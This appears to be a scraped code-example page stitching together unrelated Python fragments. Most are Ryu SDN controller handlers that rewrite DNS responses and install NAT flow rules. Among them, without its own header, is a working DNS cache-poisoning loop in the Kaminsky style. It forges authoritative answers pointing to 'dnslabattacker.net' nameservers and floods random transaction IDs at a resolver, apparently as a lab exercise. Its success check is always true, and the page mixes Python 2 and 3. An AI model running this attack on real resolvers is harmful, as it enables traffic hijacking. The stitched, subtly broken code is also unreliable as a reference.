Exemple #1
0
    def handle_packet(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
        pkt_udp = self._pkt.get_protocols(udp.udp)
        dns = DNS(self._pkt[-1])
        cs = self._controller.get_customers()
        nsdomain = cs[0].get_ns_domain_name()

        if dns.qr == 1 and dns.ar.rrname != cs[0].get_ns_domain_name():
            dns.id = self._controller.get_transaction_id()
            new_pkt = packet.Packet()
            new_pkt.add_protocol(
                ethernet.ethernet(src='00:aa:bb:00:0f:11',
                                  dst=cs[0].get_next_hop_mac()))
            new_pkt.add_protocol(
                ipv4.ipv4(dst=cs[0].get_name_server(),
                          src=pkt_ip.src,
                          proto=17))
            new_pkt.add_protocol(
                udp.udp(src_port=53,
                        dst_port=self._controller.get_port_number()))
            new_pkt.add_protocol(dns)
            self.send_dns_response_packet(new_pkt, cs[0].get_datapath(),
                                          cs[0].get_ingress_port())

        if dns.qr == 1 and cs[0].get_ns_domain_name() == dns.ar.rrname:
            #print '----------I am calling another controller------------'
            self.send_dns_response_to_controller(self._pkt)
Exemple #2
0
    def handle_socket_msg(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
        pkt_udp = self._pkt.get_protocols(udp.udp)[0]
        dns = DNS(self._pkt[-1])
        #print '---- I received a response with ID----', dns.id
        dnsrr = dns.an[0]
        if dns.qr == 1:

            pool = self._controller.get_pool_fittizio()
            ip = IPNetwork(pool)
            ip_list = list(ip)
            cs = self._controller.get_customers()
            customer_ip = cs[0].get_private_ip_subnet()

            if IPAddress(dnsrr.rdata) in IPNetwork(customer_ip):
                new_response = str(ip_list[1])
                responseIP = dnsrr.rdata
                myip = list(responseIP.split('.'))
                index = myip[-1]
                responseIP = str(ip_list[int(index)])
                dns.ns[0].rrname = '.'
                dns.ns[0].rrdata = '.'
                dns.id = self._controller.get_transaction_id()
                cs = self._controller.get_customers()
                new_pkt = packet.Packet()
                new_pkt.add_protocol(
                    ethernet.ethernet(src='10:00:00:00:10:ff',
                                      dst=cs[0].get_next_hop_mac()))
                new_pkt.add_protocol(
                    ipv4.ipv4(src=self._controller.get_packet_ip(),
                              dst=cs[0].get_name_server(),
                              proto=17))
                new_pkt.add_protocol(
                    udp.udp(src_port=53,
                            dst_port=self._controller.get_port_number()))
                dns.an[0].rdata = str(responseIP)
                dns.ar[0].rdata = str(ip_list[1])
                new_pkt.add_protocol(dns)
                print(
                    '----------------The Number of Exchanged PACKETS between Controllers-----',
                    self._controller.get_packet_counter())
                dnsrr = dns.an[0]
                new_pkt.serialize()
                self.send_dns_packet(new_pkt, cs[0].get_datapath(),
                                     cs[0].get_ingress_port())
def exampleSendDNSQuery():
	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
	dnsPacket = DNS(rd=1, qd=DNSQR(qname='example.com'))
	sendPacket(sock, dnsPacket, my_ip, my_port)
	response = sock.recv(4096)
	response = DNS(response)
	print "\n***** Packet Received from Remote Server *****"
	print response.show()
	print "***** End of Remote Server Packet *****\n"

	#build fake site for fake DNS and response
	
	hack = True
	
	while hack:
		fakeSite = getRandomSubDomain() + ".example.com"	
		dnsPacket.qd.qname = fakeSite
	
		response.qd.qname = fakeSite
		response.aa = 1
		response.an.rrname = fakeSite
		response.an.rdata = "1.2.3.4"
		#if response.nscount != 2: 
		#	if response.nscount > 2:			
		#		for j in  range(2,response.nscount):
		#			response.ns[j].rdata = None	
		#	response.nscount = 2
		response.ns[0].rdata = "ns1.dnslabattacker.net"
		response.ns[1].rdata = "ns2.dnslabattacker.net"
		response.ar = None
		response.arcount = 0
		
		sendPacket(sock, dnsPacket, my_ip, my_port)

		for i in range(100):
			response.id = getRandomTXID()
			sendPacket(sock, response, my_ip, my_query_port)
		
		
		testPacket = DNS(rd=1, qd=DNSQR(qname='example.com'))
		sendPacket(sock, testPacket, my_ip, my_port)
		testResp = sock.recv(4096)
		testResp = DNS(testResp)
		if testResp.ns[0].rdata == "ns1.dnslabattacker.net" or "ns2.dnslabattacker.net":
			hack = False
Exemple #4
0
    def handle_packet(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)
        pkt_udp = self._pkt.get_protocols(udp.udp)
        dns = DNS(self._pkt[-1])
        dnsrr = dns.an[0]
        csR = self._controller.get_customers_remote()
        cs = self._controller.get_customers()
        mac_list = []
        cname = None
        cr_name = []
        cs_name = []
        query = dnsrr.rrname.split('.')
        eth = pkt_eth.src
        new_query = query[1] + '.' + query[2]

        dst_index = None
        dst_index = self._controller.get_current_customer_id()
        print(eth, '--------------dst-cust-----------',
              self._controller.get_destination_customer())
        #send the DNS response to remote controller if the customer is a reomte one
        for i in range(len(cs)):
            cs_name.append(cs[i].get_name())
        print '-------cs-name----------------------------', cs_name, self._controller.get_destination_customer(
        ), '-------dns.qr----', dns.qr
        current = self._controller.get_destination_customer()
        if self._controller.get_destination_customer() is None and dns.qr == 1:
            #if current is not None:
            self.send_dns_response_to_controller(self._pkt)
        #send the DNS response to customer ce if the customer is within the current controller ISP
        #for c in range(len(cs)):
        #if new_query in cs[c].get_name_server():
        #cs_name.append(cs[c].get_name())
        #dst_index=c
        elif self._controller.get_destination_customer(
        ) is not None and dns.qr == 1:
            #elif eth in mac_list and dst_index is not None:
            print('------------------------cs index------------', dst_index)
            responseIP = dnsrr.rdata
            if dns.nscount >= 1:
                dns.ns[0].rrname = 'ROOT-SERVER.'
                dns.ns[0].rdata = '10.1.0.18'
            if dns.arcount >= 1:
                dns.ar.rrname = 'ROOT-SERVER.'
                dns.ar.rdata = '10.1.0.18'

            dns.id = self._controller.get_transaction_id()
            cs = self._controller.get_customers()
            #print'--len(cs)--',len(cs),'----------',cs[dst_index].get_next_hop_mac(),'-port-',self._controller.get_port_number()
            new_pkt = packet.Packet()
            new_pkt.add_protocol(
                ethernet.ethernet(src='10:00:00:00:10:ff',
                                  dst=cs[dst_index].get_next_hop_mac()))
            #new_pkt.add_protocol(ipv4.ipv4(src='10.1.0.18',dst=cs[index1].get_name_server(),proto=17))
            new_pkt.add_protocol(
                ipv4.ipv4(src=IPAddress('10.1.0.18'),
                          dst=cs[dst_index].get_name_server(),
                          proto=17))
            new_pkt.add_protocol(
                udp.udp(src_port=53,
                        dst_port=self._controller.get_port_number()))
            new_pkt.add_protocol(dns)
            new_pkt.serialize()
            #print'---final values ID=%i, cs-ID=%s, udp-port=%i'% (self._controller.get_transaction_id(),self._controller.get_current_customer_id(),self._controller.get_port_number())
            self.send_dns_packet(new_pkt, cs[dst_index].get_datapath(),
                                 cs[dst_index].get_ingress_port())
            print '---------final pkt is sent--------------------------------------------'
Exemple #5
0
    def handle_packet(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
        pkt_udp = self._pkt.get_protocols(udp.udp)
        dns = DNS(self._pkt[-1])
        cs = self._controller.get_customers()
        csR = self._controller.get_customers_remote()
        cs_list = []
        cr_list = []
        name_customer = None
        name_list = []
        name_server_list = []
        for c in range(len(cs)):
            name_list.append(cs[c].get_name())
            name_server_list.append(cs[c].get_name_server())
        for c in range(len(csR)):
            name = csR[c].get_name_server()
            #print'--name--',name
            cr_list.append(name[0])
            if dns.ar.rrname == name[0]:
                name_customer = csR[c].get_name()
        index = self._controller.get_current_customer_id()
        nsdomain = cs[index].get_ns_domain_name()
        #print('--dns--',dns)
        print('--name_server_list--', name_server_list)
        print('--cs_list--', cs_list)
        print('--cr_list--', cr_list)
        print('--name_list--', name_list)
        print('---name-customer--', name_customer, dns.ar.rrname)
        for c in range(len(cs)):
            if cs[c].get_name() == name_customer:
                index_new = c
        #print('-------dns.----',dns)
        #if dns.qr==1 and dns.ar.rrname!=cs[0].get_ns_domain_name():
        if dns.qr == 1 and dns.ar.rrname not in cr_list and name_customer is None:
            dns.id = self._controller.get_transaction_id()
            new_pkt = packet.Packet()
            new_pkt.add_protocol(
                ethernet.ethernet(src='00:aa:bb:00:0f:11',
                                  dst=cs[index].get_next_hop_mac()))
            new_pkt.add_protocol(
                ipv4.ipv4(dst=cs[index].get_name_server(),
                          src=pkt_ip.src,
                          proto=17))
            new_pkt.add_protocol(
                udp.udp(src_port=53,
                        dst_port=self._controller.get_port_number()))
            new_pkt.add_protocol(dns)
            self.send_dns_response_packet(new_pkt, cs[index].get_datapath(),
                                          cs[index].get_ingress_port())
        elif dns.qr == 1 and name_customer in name_list:
            print('---------SALAM-----------', index_new, pkt_ip)
            dns.id = self._controller.get_transaction_id()
            new_pkt = packet.Packet()
            new_pkt.add_protocol(
                ethernet.ethernet(src='00:aa:bb:00:0f:11',
                                  dst=cs[index].get_next_hop_mac()))
            new_pkt.add_protocol(
                ipv4.ipv4(dst=cs[index].get_name_server(),
                          src=pkt_ip.src,
                          proto=17))
            new_pkt.add_protocol(
                udp.udp(src_port=53,
                        dst_port=self._controller.get_port_number()))
            new_pkt.add_protocol(dns)
            self.send_dns_response_packet(new_pkt, cs[index].get_datapath(),
                                          cs[index].get_ingress_port())

        if dns.qr == 1 and dns.ar.rrname in cr_list and name_customer not in name_list:
            print '----------I am calling another controller------------'
            self.send_dns_response_to_controller(self._pkt)
Exemple #6
0
    def handle_socket_msg(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
        pkt_udp = self._pkt.get_protocols(udp.udp)[0]
        dns = DNS(self._pkt[-1])
        print '---- I received final DNS answer----', dns.id
        dnsrr = dns.an[0]
        if dns.qr == 1 and self._controller.get_transaction_id() is not None:

            pool = self._controller.get_pool_fittizio()
            ip = IPNetwork(pool)
            ip_list = list(ip)
            cs = self._controller.get_customers()
            index1 = self._controller.get_current_customer_id()
            customer_ip = cs[index1].get_private_ip_subnet()
            print('---------INDEX--', index1)
            #if IPAddress(dnsrr.rdata) in IPNetwork(customer_ip):

            if IPAddress(dnsrr.rdata) is not None:
                new_response = str(ip_list[1])
                responseIP = dnsrr.rdata
                if IPAddress(responseIP) in IPNetwork(
                        cs[index1].get_private_ip_subnet()):
                    myip = list(responseIP.split('.'))
                    index = myip[-1]
                    responseIP = str(ip_list[int(index)])
                dns.ns[0].rrname = '.'
                dns.ns[0].rrdata = '.'
                dns.id = self._controller.get_transaction_id()
                new_pkt = packet.Packet()
                new_pkt.add_protocol(
                    ethernet.ethernet(src='10:00:00:00:10:ff',
                                      dst=cs[int(index1)].get_next_hop_mac()))
                new_pkt.add_protocol(
                    ipv4.ipv4(src=self._controller.get_packet_ip(),
                              dst=cs[int(index1)].get_name_server(),
                              proto=17))
                new_pkt.add_protocol(
                    udp.udp(src_port=53,
                            dst_port=self._controller.get_port_number()))
                dns.an[0].rdata = str(responseIP)
                dns.ar[0].rdata = str(ip_list[1])
                print('-----FINAL DNS-----', dns)
                new_pkt.add_protocol(dns)
                print(
                    '----------------The Number of Exchanged PACKETS between Controllers-----',
                    self._controller.get_packet_counter())
                dnsrr = dns.an[0]
                new_pkt.serialize()
                self.send_dns_packet(new_pkt, cs[int(index1)].get_datapath(),
                                     cs[int(index1)].get_ingress_port())

                #A rule to change the change made by SDNS to original one-->fake private ip address to real private ip address
                #find dst fake private ip and then create the original private ip--> the opposite of SDNS
                dns = DNS(self._pkt[-1])
                dnsrr = dns.an[0]
                rIP = responseIP
                print '------get_pool_fittizio--------', self._controller.get_pool_fittizio(
                ), responseIP
                if IPAddress(responseIP) in IPNetwork(
                        self._controller.get_pool_fittizio()):
                    pool = cs[index1].get_private_ip_subnet()
                    ip = IPNetwork(pool)
                    ip_list = list(ip)
                    myip = list(rIP.split('.'))
                    index = myip[-1]
                    rIP = str(ip_list[int(index)])
                    datapath = cs[index1].get_datapath()
                    ofproto = datapath.ofproto
                    parser = datapath.ofproto_parser
                    print '-------NAT IP after SDNS----', rIP
                    match_fake = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
                                                 ipv4_dst=(responseIP))
                    actions_fake = [
                        parser.OFPActionSetField(ipv4_dst=rIP),
                        parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
                                               ofproto.OFPCML_NO_BUFFER)
                    ]
                    inst_fake = [
                        parser.OFPInstructionActions(
                            ofproto.OFPIT_APPLY_ACTIONS, actions_fake)
                    ]
                    mod_fake = parser.OFPFlowMod(datapath=datapath,
                                                 match=match_fake,
                                                 instructions=inst_fake,
                                                 priority=150)
                    datapath.send_msg(mod_fake)
Exemple #7
0
    def handle_socket_msg(self):
        pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0]
        pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0]
        pkt_udp = self._pkt.get_protocols(udp.udp)[0]
        dns = DNS(self._pkt[-1])
        #print '--------I received a response with ID-------', dns.id
        dnsrr = dns.an[0]
        index1 = self._controller.get_current_customer_id()
        if dns.qr == 1 and index1 is not None and self._controller.get_destination_customer(
        ) is None and self._controller.get_port_number() is not None:
            pool = self._controller.get_pool_fittizio()
            ip = IPNetwork(pool)
            ip_list = list(ip)
            #print( '-----pkt--------',self._pkt)
            cs = self._controller.get_customers()
            #for c in range(len(cs)):
            #if
            print('------------------------cs index------------', index1)
            #customer_ip=cs[index1].get_private_ip_subnet()
            #responseIP=dnsrr.rdata
            #if IPAddress(dnsrr.rdata) in IPNetwork(customer_ip):
            if dnsrr.rdata is not None:
                new_response = str(ip_list[1])
                responseIP = dnsrr.rdata
                responseIP2 = dnsrr.rdata

                #check wheather the response IP overlaps with src or not? if so, do NAT
                if IPAddress(responseIP) in IPNetwork(
                        cs[index1].get_private_ip_subnet()):
                    myip = list(responseIP.split('.'))
                    index = myip[-1]
                    responseIP = str(ip_list[int(index)])
                #print('--DNS before---',dns)
                if dns.nscount >= 1:
                    dns.ns[0].rrname = 'ROOT-SERVER.'
                    dns.ns[0].rdata = '10.1.0.18'
                if dns.arcount >= 1:
                    dns.ar.rrname = 'ROOT-SERVER.'
                    dns.ar.rdata = '10.1.0.18'

                dns.id = self._controller.get_transaction_id()
                cs = self._controller.get_customers()
                print '--len(cs)--', len(
                    cs), '----------', cs[index1].get_next_hop_mac(
                    ), '-port-', self._controller.get_port_number()
                new_pkt = packet.Packet()
                new_pkt.add_protocol(
                    ethernet.ethernet(src='10:00:00:00:10:ff',
                                      dst=cs[index1].get_next_hop_mac()))
                #new_pkt.add_protocol(ipv4.ipv4(src='10.1.0.18',dst=cs[index1].get_name_server(),proto=17))
                new_pkt.add_protocol(
                    ipv4.ipv4(src=IPAddress('10.1.0.18'),
                              dst=cs[index1].get_name_server(),
                              proto=17))
                new_pkt.add_protocol(
                    udp.udp(src_port=53,
                            dst_port=self._controller.get_port_number()))
                #new_dns=DNS(rd=0,id=pkt_dns.id,qd=DNSQR(qname=dns.qd.qname),ns=DNSRR(rrname=dns.ar.rrname,type=1,ttl=60000,rdata=cs[index1].get_name_server()))
                #new_pkt.add_protocol(new_dns)
                dns.an[0].rdata = str(responseIP)
                #dns1=DNS(rd=0, id=dns.id, qr=1L, qd=dns.qd, ancount=1, nscount=1, arcount=1, an=(DNSRR(rrname=dnsrr.rrname, type='A', rclass='IN', ttl=60000, rdata=str(responseIP))), ns=(DNSRR(rrname='ROOT-SERVER.', type='NS',rclass='IN', ttl=3600, rdata='.')), ar=DNSRR(rrname='ROOT-SERVER.', type='A', rclass='IN' ,ttl=60000, rdata='10.1.0.18'))

                #print('-----FINAL DNS-----',dns)
                new_pkt.add_protocol(dns)
                new_pkt.serialize()
                #print('--akher packet---',new_pkt)
                #print'---final values ID=%i, cs-ID=%s, udp-port=%i'% (self._controller.get_transaction_id(),self._controller.get_current_customer_id(),self._controller.get_port_number())
                self.send_dns_packet(new_pkt, cs[index1].get_datapath(),
                                     cs[index1].get_ingress_port())
                print '---------final pkt is sent--------------------------------------------'

                #A rule to change the change made by SDNS to original one-->fake private ip address to real private ip address
                #find dst fake private ip and then create the original private ip--> the opposite of SDNS
                dns = DNS(self._pkt[-1])
                dnsrr = dns.an[0]
                rIP = responseIP
                print '------get_pool_fittizio--------', self._controller.get_pool_fittizio(
                ), responseIP
                if IPAddress(responseIP) in IPNetwork(
                        self._controller.get_pool_fittizio()):
                    pool = cs[index1].get_private_ip_subnet()
                    ip = IPNetwork(pool)
                    ip_list = list(ip)
                    myip = list(rIP.split('.'))
                    index = myip[-1]
                    rIP = str(ip_list[int(index)])
                    datapath = cs[index1].get_datapath()
                    ofproto = datapath.ofproto
                    parser = datapath.ofproto_parser
                    print '-------NAT IP after SDNS----', rIP
                    match_fake = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,
                                                 ipv4_dst=(responseIP))
                    actions_fake = [
                        parser.OFPActionSetField(ipv4_dst=rIP),
                        parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
                                               ofproto.OFPCML_NO_BUFFER)
                    ]
                    inst_fake = [
                        parser.OFPInstructionActions(
                            ofproto.OFPIT_APPLY_ACTIONS, actions_fake)
                    ]
                    mod_fake = parser.OFPFlowMod(datapath=datapath,
                                                 match=match_fake,
                                                 instructions=inst_fake,
                                                 priority=150)
                    datapath.send_msg(mod_fake)